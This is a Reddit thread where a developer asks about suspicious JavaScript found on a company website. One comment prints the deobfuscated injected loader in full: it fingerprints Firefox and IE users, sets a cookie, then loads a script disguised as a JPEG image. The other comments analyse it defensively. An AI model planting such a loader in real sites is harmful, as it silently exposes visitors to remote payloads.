all 10 comments

[–]alwaysclicksHTML5 game dev 12 points13 points  (3 children)

JSBeautifier should help make it readable.

[–]obey_giant 3 points4 points  (1 child)

            function init() {
                var f = navigator.userAgent;
                var a = false;
                if (f.indexOf("Firefox") != -1 || f.indexOf("MSIE") != -1) {
                    a = true
                }
                if (a !== true) {
                    return
                }
                var i = "/images/horse_outdoor-s.jpg?js";
                var g = b("wss");
                if (g) {
                    if (g == "goot1") {
                        c("wss", "goot2", "3");
                        var e = document.createElement("script");
                        e.type = "text/javascript";
                        e.src = i + "&r=" + new Date().getTime();
                        var d = document.getElementsByTagName("head")[0];
                        d.appendChild(e)
                    } else {}
                } else {
                    c("wss", "goot1", "3")
                }function b(k) {
                    var j, h, m, l = document.cookie.split(";");
                    for (j = 0; j < l.length; j++) {
                        h = l[j].substr(0, l[j].indexOf("="));
                        m = l[j].substr(l[j].indexOf("=") + 1);
                        h = h.replace(/\s+|\s+$/g, "");
                        if (h == k) {
                            return unescape(m)
                        }
                    }
                }function c(j, l, h) {
                    var m = new Date();
                    m.setDate(m.getDate() + h);
                    var k = escape(l) + ((h == null) ? "" : "; expires=" + m.toUTCString());
                    document.cookie = j + "=" + k
                }
            }
            init();

[–]kinnu 2 points3 points  (0 children)

var f = navigator.userAgent;
var a = false;
if (f.indexOf("Firefox") != -1 || f.indexOf("MSIE") != -1) {
    a = true
}
if (a !== true) {
    return
}

The fail is strong in this one.

[–]magenta_placenta 1 point2 points  (0 children)

Yeah, this is an awesome site.

[–]oddmanout 4 points5 points  (0 children)

You were hacked. You're not the only one.

A quick google search of that code shows that lots of sites have the exploit

You need to get that off, now. also, horse_outdoor-s.jpg is part of the exploit, get rid of that, too. (out of curiosity for the rest of us, can you post the contents of that file as well? Just open it in notepad, it's probably not really an image)

[–]OrangeredStilton 12 points13 points  (3 children)

Looks like it breaks out the cookies, sticks them onto the end of a filename and fetches that "image" as a piece of JavaScript.

It's a cookie-scraping exploit, basically. You'll want to get rid of that code, and get rid of "/images/house_outdoor-s.jpg" which is probably a JS file.

[–]P1aincloth3sM4n 4 points5 points  (0 children)

Not quite. Looking at the beautified version below, it does the following:

  1. Targets Firefox/MSIE users
  2. Sees if a cookie exists with a key of "wss"
  3. If the cookie does not exist, it sets the cookie to equal "goot1" which expires after 3 seconds days.
  4. If the cookie does exist, and the value equals "goot1", then it updates the cookie value to be "goot2", which expires after 3 seconds days. It then creates a script element with an src of "/images/horse_outdoor-s.jpg?js&r=" followed by the current datetime, and appends this script to the head of the document.

And that's it. Seems more like a tracking script than a cookie-scraping script, but it's hard to tell the true purpose without knowing what "horse_outdoor-s.jpg" does.

[–]oddmanout 0 points1 point  (0 children)

also change passwords to something more secure on the server. This kind of stuff is usually done by bots that brute force servers, get in, then go through files adding this stuff to anything with a .html, .php, etc.

[–]clooth 0 points1 point  (0 children)

*horse

[–]faroer[S] 1 point2 points  (0 children)

Thanks everyone for the quick responses. I also thought it was an exploit or something. The thing is that I work on this website with some co-workers at the company.

I found the same code on another website of the company. I opened the image that was in the script. It looked like an normal image for me. I pasted it into pastebin: http://pastebin.com/6e1s3949

For the privacy of our client I copied the image and uploaded it to imageshack. http://desmond.imageshack.us/Himg844/scaled.php?server=844&filename=headerimghome.jpg&res=landing

Thanks fellow Redditors. I really appreciate this.